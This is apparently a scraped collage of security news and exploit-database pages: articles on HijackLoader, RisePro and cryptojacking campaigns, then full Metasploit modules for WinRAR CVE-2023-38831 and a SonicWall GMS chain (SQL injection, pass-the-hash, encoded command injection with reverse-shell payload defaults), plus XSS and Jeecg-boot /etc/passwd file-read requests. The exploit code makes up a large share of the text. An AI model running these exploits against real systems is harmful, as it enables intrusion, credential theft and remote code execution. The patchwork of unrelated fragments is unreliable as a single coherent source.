A new malware loader called HijackLoader is gaining traction among the cybercriminal community to deliver various payloads such as DanaBot, SystemBC, and RedLine Stealer.
"Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler

A new malware loader called HijackLoader is gaining traction among the cybercriminal community to deliver various payloads such as DanaBot, SystemBC, and RedLine Stealer.

"Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler ThreatLabz researcher Nikolaos Pantazopoulos said.

First observed by the company in July 2023, the malware employs a number of techniques to fly under the radar. This involves using syscalls to evade monitoring from security solutions, monitoring processes associated with security software based on an embedded blocklist, and putting off code execution by as much as 40 seconds at different stages.

The exact initial access vector used to infiltrate targets is currently not known. The anti-analysis aspects notwithstanding, the loader packs in a main instrumentation module that facilitates flexible code injection and execution using embedded modules.

Persistence on the compromised host is achieved by creating a shortcut file (LNK) in the Windows Startup folder and pointing it to a Background Intelligent Transfer Service (BITS) job.

"HijackLoader is a modular loader with evasion techniques, which provides a variety of loading options for malicious payloads," Pantazopoulos said. "Moreover, it does not have any advanced features and the quality of the code is poor."

The disclosure comes as Flashpoint disclosed details of an updated version of an information-stealing malware known as RisePro that was previously distributed via a pay-per-install (PPI) malware downloader service dubbed PrivateLoader.

"The seller claimed in their ads that they have taken the best aspects of 'RedLine' and 'Vidar' to make a powerful stealer," Flashpoint noted. "And this time, the seller also promises a new advantage for users of RisePro: customers host their own panels to ensure logs are not stolen by the sellers."

RisePro, written in C++, is designed to harvest sensitive information on infected machines and exfiltrate it to a command-and-control (C&C) server in the form of logs. It was first offered for sale in December 2022.

It also follows the discovery of a new information stealer written in Node.js that's packaged into an executable and distributed via malicious Large Language Model (LLM)-themed Facebook ads and bogus websites impersonating ByteDance's CapCut video editor.

"When the stealer is executed, it runs its main function that steals cookies and credentials from several Chromium-based web browsers, then exfiltrates the data to the C&C server and to the Telegram bot," security researcher Jaromir Horejsi said.

"It also subscribes the client to the C&C server running GraphQL. When the C&C server sends a message to the client, the stealing function will run again." Targeted browsers include Google Chrome, Microsoft Edge, Opera (and OperaGX), and Brave.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

This is the second time fake CapCut websites have been observed delivering stealer malware. In May 2023, Cyble uncovered two different attack chains that leveraged the software as a lure to trick unsuspecting users into running Offx Stealer and RedLine Stealer.

The developments paint a picture of a constantly evolving cybercrime ecosystem, with stealer infections acting as a primary initial attack vector used by threat actors to infiltrate organizations and conduct post-exploitation actions.

It's therefore not surprising that threat actors are jumping on the bandwagon to spawn new stealer malware strains such as Prysmax that incorporate a Swiss Army knife of functionalities that enable their customers to maximize their reach and impact.

"The Python-based malware is packed using Pyinstaller, which can be used to bundle the malicious code and all its dependencies into a single executable," Cyfirma said. "The information stealing malware is focused on disabling Windows Defender, manipulating its settings, and configuring its own response to threats."

"It also attempts to reduce its traceability and maintain a foothold on the compromised system. The malware appears to be well-designed for data theft and exfiltration, while evading detection by security tools as well as dynamic analysis sandboxes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New HijackLoader Modular Malware Loader Making Waves in the Cybercrime World

Categories: News
Tags: week

Tags:  security

Tags:  September

Tags:  2023

Tags:  Atomic stealer

Tags:  Microsoft breach

A list of topics we covered in the week of September 4 to September 10 of 2023



(Read more...)




The post A week in security (September 4 - September 10) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

For Personal

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

See all

Company

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Rootkit Scanner

Trojan Scanner

Virus Scanner

Spyware Scanner  

Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (September 4 - September 10)

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository hamza417/inure prior to build92.

Expand Up

@@ -76,6 +76,7 @@

android:theme\="@style/Inure"

android:windowSoftInputMode\="adjustPan"

tools:ignore\="AllowBackup"

android:taskAffinity\="app.simple.inure"

tools:targetApi\="tiramisu"\>

  

<profileable android:shell\="true" />

Expand Down Expand Up

@@ -107,7 +108,6 @@

android:exported\="true"

android:label\="@string/terminal"

android:launchMode\="singleTask"

android:taskAffinity\="app.simple.inure"

android:windowSoftInputMode\="adjustResize" />

  

<activity

Expand Down

CVE-2023-4877: Build92 · Hamza417/Inure@09762e8

A legitimate Windows tool used for creating software packages called Advanced Installer is being abused by threat actors to drop cryptocurrency-mining malware on infected machines since at least November 2021.
"The attacker uses Advanced Installer to package other legitimate software installers, such as Adobe Illustrator, Autodesk 3ds Max, and SketchUp Pro, with malicious scripts and uses

A legitimate Windows tool used for creating software packages called **Advanced Installer** is being abused by threat actors to drop cryptocurrency-mining malware on infected machines since at least November 2021.

"The attacker uses Advanced Installer to package other legitimate software installers, such as Adobe Illustrator, Autodesk 3ds Max, and SketchUp Pro, with malicious scripts and uses Advanced Installer's Custom Actions feature to make the software installers execute the malicious scripts," Cisco Talos researcher Chetan Raghuprasad said in a technical report.

The nature of the applications trojanized indicates that the victims likely span architecture, engineering, construction, manufacturing, and entertainment sectors. The software installers predominantly use the French language, a sign that French-speaking users are being singled out.

This campaign is strategic in that these industries rely on computers with high Graphics Processing Unit (GPU) power for their day-to-day operations, making them lucrative targets for cryptojacking.

Cisco's analysis of the DNS request data sent to the attacker's infrastructure shows that the victimology footprint spans France and Switzerland, followed by sporadic infections in the U.S., Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and Vietnam.

The attacks culminate in the deployment of an M3\_Mini\_Rat, a PowerShell script that likely acts as a backdoor to download and execute additional threats, as well as multiple cryptocurrency-mining malware families such as PhoenixMiner and lolMiner.

As for the initial access vector, it's suspected that search engine optimization (SEO) poisoning techniques may have been employed to deliver the rigged software installers to the victim's machines.

The installer, once launched, activates a multi-stage attack chain that drops the M3\_Mini\_Rat client stub and the miner binaries.

"M3\_Mini\_Rat client is a PowerShell script with remote administration capabilities that mainly focuses on performing system reconnaissance and downloading and executing other malicious binaries," Raghuprasad said.

The trojan is designed to contact a remote server, although it's currently unresponsive, making it difficult to determine the exact nature of malware that may have been distributed through this process.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

The two other malicious payloads are used to illicitly mine cryptocurrency using the machine's GPU resources. PhoenixMiner is an Ethereum cryptocurrency-mining malware, while lolMiner is an open-source mining software that can be used to mine two virtual currencies at the same time.

In yet another case of legitimate tool abuse, Check Point is warning of a new type of phishing attack that leverages Google Looker Studio to create bogus cryptocurrency phishing sites in an attempt to sidestep protections.

"Hackers are utilizing it to create fake crypto pages that are designed to steal money and credentials," security researcher Jeremy Fuchs said.

"This is a long way of saying that hackers are leveraging Google's authority. An email security service will look at all these factors and have a good deal of confidence that it is not a phishing email, and that it comes from Google."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Weaponizing Legitimate Advanced Installer Tool in Crypto-Mining Attacks

This Metasploit module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zip'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WinRAR CVE-2023-38831 Exploit',        'Description' => %q{          This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its          embedded document, the decoy document is executed, leading to code execution.        },        'License' => MSF_LICENSE,        'Author' => ['Alexander "xaitax" Hagenah'],        'References' => [          ['CVE', '2023-38831'],          ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],          ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']        ],        'Platform' => ['win'],        'Arch' => [ ARCH_X64, ARCH_X86 ],        'Targets' => [['Windows', {}]],        'Payload' => {          'DisableNops' => true        },        'DisclosureDate' => '2023-08-23',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),      OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])    ])    register_advanced_options([      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil])    ])  end  def exploit    Dir.mktmpdir do |temp_dir|      output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])      input_file = datastore['INPUT_FILE']      decoy_name = File.basename(input_file)      decoy_ext = ".#{File.extname(input_file)[1..]}"      payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe'      decoy_dir = File.join(temp_dir, "#{decoy_name}A")      Dir.mkdir(decoy_dir)      payload_path = File.join(decoy_dir, payload_name)      File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }      bat_script = <<~BAT        @echo off        start "" "%~dp0#{payload_name}"        start "" "%~dp0#{decoy_name}"      BAT      bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")      File.write(bat_path, bat_script)      FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))      zip_path = File.join(temp_dir, 'template.zip')      Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|        zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))        zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)        zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)      end      content = File.binread(zip_path)      content.gsub!(decoy_ext + 'A', decoy_ext + ' ')      content.gsub!(decoy_ext + 'B', decoy_ext + ' ')      File.binwrite(output_rar, content)      print_good("Created #{output_rar}")    end  endend

WinRAR Remote Code Execution

This Metasploit module exploits a series of vulnerabilities - including auth bypass, SQL injection, and shell injection - to obtain remote code execution on SonicWall GMS versions 9.9.9320 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html  # We can actually use the title to identify which platform we're on  TITLE_WINDOWS = 'SonicWall Universal Management Host'  TITLE_LINUX = 'SonicWall Universal Management Appliance'  # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)  SECRET_KEY = '?~!@#$%^^()'  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sonicwall',        'Description' => %q{          This module exploits a series of vulnerabilities - including auth          bypass, SQL injection, and shell injection - to obtain remote code          execution on SonicWall GMS versions <= 9.9.9320.        },        'License' => MSF_LICENSE,        'Author' => [          'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis          'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis        ],        'References' => [          [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],          [ 'CVE', '2023-34124'],          [ 'CVE', '2023-34133'],          [ 'CVE', '2023-34132'],          [ 'CVE', '2023-34127']        ],        'Privileged' => true,        'Targets' => [          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'WritableDir' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['win'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'WritableDir' => '%TEMP%'              }            }          ],          [            'Linux Command',            {              'Platform' => ['linux', 'unix'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/generic'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-12',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'SSL' => true,          'RPORT' => '443'        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),      ]    )    register_advanced_options([      # This varies by target, so don't define the default here      OptString.new('WritableDir', [true, 'A directory where we can write files']),    ])  end  def check    vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    # Basic sanity checks - the path should return a HTTP/200    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?    return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200    # Ensure we're hitting plausible software    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</    # Otherwise, probably safe?    CheckCode::Safe('Does not appear to be running SonicWall GMS')  end  # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to  # get a password hash  def get_password_hash    # attempt a sqli.    vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')    # SQL injection question to fetch the admin password    query = "' union select " +            # This must be a valid DOMAIN, which we can thankfully fetch from the DB            '(select ID from SGMSDB.DOMAINS limit 1), ' +            # These fields don't matter            "'', '', '', '', '', " +            # This field is returned, so use it to get the id and password for our            # the super user, if possible            "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +            # The rest of the fields don't matter, end with a single quote to finish with a clean query            "'', '', '"    vprint_status("Generated SQL injection: #{query}")    # We need to sign our query with the SECRET_KEY    token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))    vprint_status("Generated a token using built-in secret key: #{token}")    # Build the URI    # Note that encoding space to '+' doesn't work, so we replace it with '%20'    uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))    # Do it!    print_status('Sending SQL injection request to get the username/hash...')    res = send_request_cgi(      'method' => 'GET',      'uri' => uri,      'headers' => {        'Auth' => '{"user": "system", "hash": "' + token + '"}'      }    )    # Sanity checks    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty?    # This field has the SQL injection response    hash = res.get_json_document['alias']    # If the server responds with an error, it has no 'alias' field so the key    # is missing entirely (this is where it fails against patched targets)    fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?    # If alias is present but contains nothing, that means our query got no    # results (probably there are no active users, or something?)    fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?    # If there's no ':' in the response, something super weird happened    fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')    username, hash = hash.split(/:/, 2)    print_good("Found an account: #{username}:#{hash}")    [username, hash]  end  # Exploits CVE-2023-34132 (pass the hash)  def authenticate(username, hash)    # Grab server hashing token    vprint_status('Grabbing server hashing token...')    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/appliance/login'),      'keep_cookies' => true    )    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Look for the getPwdHash function call, as it contains the token we need    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')    end    server_token = ::Regexp.last_match(1)    vprint_status("Got the server-side token: #{server_token}")    # Generate the client_hash by combining the server token + the stolen    # password hash    client_hash = Digest::MD5.hexdigest(server_token + hash)    vprint_status("Generated client token: #{client_hash}")    # Send the token    print_status('Attempting to authenticate with the client token + password hash...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'login',        'clientHash' => client_hash,        'applianceUser' => username      }    })    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Check the title to make sure it worked    html = res.get_html_document    title = html.at('title').text    # We can identify the platform based on the title    if title == TITLE_LINUX      print_good("Successfully logged in as #{username} (Linux detected!)")      return Msf::Module::Platform::Linux    elsif title == TITLE_WINDOWS      print_good("Successfully logged in as #{username} (Windows detected!)")      return Msf::Module::Platform::Windows    end    fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")  end  def execute_command_windows(cmd)    vprint_status("Encoding (Windows) command: #{cmd}")    # While this is a shell command injection issue, an aggressive XSS filter    # prevents us from using a lot of important characters such as quotes and    # plus and ampersands and stuff. We can't even use Base64, because we can't    # use the + sign!    #    # We discovered that we could encode the command as integers, then use    # powershell to decode + execute it, so that's what this does.    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"    # Run the command    vprint_status("Running shell command: #{cmd}")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => 'C:\\GMSVP\\etc\\',        'searchFilter' => "|#{encoded_cmd}| rem "      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def execute_command_linux(cmd)    vprint_status('Encoding (Linux) payload')    # Generate a filename    payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")    # Wrap the command so we can execute arbitrary commands. There are several    # difficulties here, the first of which is that we don't have much in the    # way of tools. We're missing curl, wget, base64, python, ruby, even perl!    # The best tool I could find for staging a payload is uudecode, so we use    # that. (I noticed later that telnet exists, which could be another option)    #    # The good news is, with uudecode, we can send a base64 payload. The bad    # news is, we can't use '+', which means we can't use pure base64! To work    # around that, we replace '+' with '@', then use a bit of Bash magic to    # put it back! We also can't use quotes, so we have to do a mountain of    # escaping instead. The default shell is also /bin/sh, so we need to run    # bash explicitly for the `$()` substitutions to work.    cmd = [      # Build a command that runs in bash (but don't use quotes!)      'bash -c ',      # Escape all this for bash      Shellwords.escape([        # Use `uudecode` to get a '+' into a variable        "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",        # Build a new uuencode file (encoded in base64) with the payload        "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",        # Encode the payload as base64, but replace + with a variable        "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",        # Pipe into uudecode        '==== | uudecode;',        # Run in the background with coproc        "coproc #{Shellwords.escape(payload_file)};",        # Delete the payload file        "rm #{payload_file}"      ].join)    ].join    # Run it!    vprint_status("Encoded shell command: #{cmd}")    print_status('Attempting to execute the shell injection payload')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => '/opt/GMSVP/etc/',        'searchFilter' => ";#{cmd}#"      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def exploit    # Get the password hash (from SQL injection + auth bypass)    username, hash = get_password_hash    # Use pass-the-hash to log in using that hash    detected_platform = authenticate(username, hash)    # Sanity-check the target    if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")    end    # Generate a payload based on the target type    case target['Type']    when :cmd      my_payload = payload.encoded    when :dropper      my_payload = generate_payload_exe    else      fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")    end    # Run a command, using the platform specified in the target    if target.platform.platforms.include?(Msf::Module::Platform::Linux)      execute_command_linux(my_payload)    elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)      execute_command_windows(my_payload)    else      fail_with(Failure::Unknown, "Unknown platform: #{platform}")    end  endend

Sonicwall GMS 9.9.9320 Remote Code Execution

The Microsoft Windows Kernel has an issue where a partial success of registry hive log recovery may lead to inconsistent state and memory corruption.

Microsoft Windows Kernel Recovery Memory Corruption

The Microsoft Windows Kernel suffers from out-of-bounds reads due to an integer overflow in registry .LOG file parsing.

Microsoft Windows Kernel Integer Overflow / Out-Of-Bounds Read

Event Ticketing System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Ticketing System-1.0 XSS-Reflected - RCE## Author: nu11secur1ty## Date: 09/08/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `id` request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload }}uypja"><script>alert(1)</script>k36c0 was submitted inthe id parameter. This input was echoed asuypja"><script>alert(1)</script>k36c0 in the application's response.The attacker can use this vulnerability to trick the user intoexecuting - opening the browser on his machine and opening a hazardousURL address.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1694154671_204/index.php?controller=pjFront&action=pjActionCheckout&locale=1&id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplmHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7Origin: http://demo.phpjabbers.comReferer: http://demo.phpjabbers.com/Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Ticketing-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-ticketing-system-10-xss-reflected.html)## Time spent:01:25:00

Event Ticketing System 1.0 Cross Site Scripting

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.

In the /testConnection route, a MySQL connection can be constructed to cause arbitrary file reading.

@PostMapping({"/testConnection"})
    public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
        Connection var2 = null;
        String var3 = var1.toString();
        a.info(" local cache key: " + var3);
        Object var4 = this.localCache.a(var3);
        if (g.d(var4)) {
            int var5 = g.e(var4);
            a.info(" local cache value: " + var5);
            if (var5 >= 3) {
                return Result.error("数据源已连接错误3次以上,请检查配置信息！");
            }

            if (var5 == 0) {
                return Result.OK("数据库连接成功", true);
            }
        } else {
            this.localCache.a(var3, 0, 3600000L);
        }

        try {
            Result var6;
            try {
                String var37 = var1.getDbType();
                Result var40;
                if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
                    boolean var39 = this.jmreportNoSqlService.testConnection(var1);
                    if (var39) {
                        var40 = Result.OK("数据库连接成功", true);
                        return var40;
                    } else {
                        this.localCache.a(var3, 1);
                        var40 = Result.error("数据库连接失败：错误未知");
                        return var40;
                    }
                } else {
                    Class.forName(var1.getDbDriver());
                    DriverManager.setLoginTimeout(60);
                    String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
                    var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
                    if (var2 == null) {
                        this.localCache.a(var3, 1);
                        var40 = Result.OK("数据库连接失败：错误未知", true);
                        return var40;

There is protection during the parsing process.

    public static String g(String var0) {
        if (a(var0, "mysql")) {
            if (var0.indexOf("allowLoadLocalInfile") > 0) {
                var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
            } else {
                var0 = var0 + "&allowLoadLocalInfile=false";
            }
        }

we can bypass it

POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{
    "id":"1",
    "code":"select \* from information\_schema.tables",
    "dbType":"jndi",
    "dbDriver":"com.mysql.cj.jdbc.Driver",
    "dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
    "dbName":"information\_schema",
    "dbUsername":"fileread\_/etc/passwd",
    "dbPassword":"password",
    "connectionTimaes":"5"
}

Tag

#windows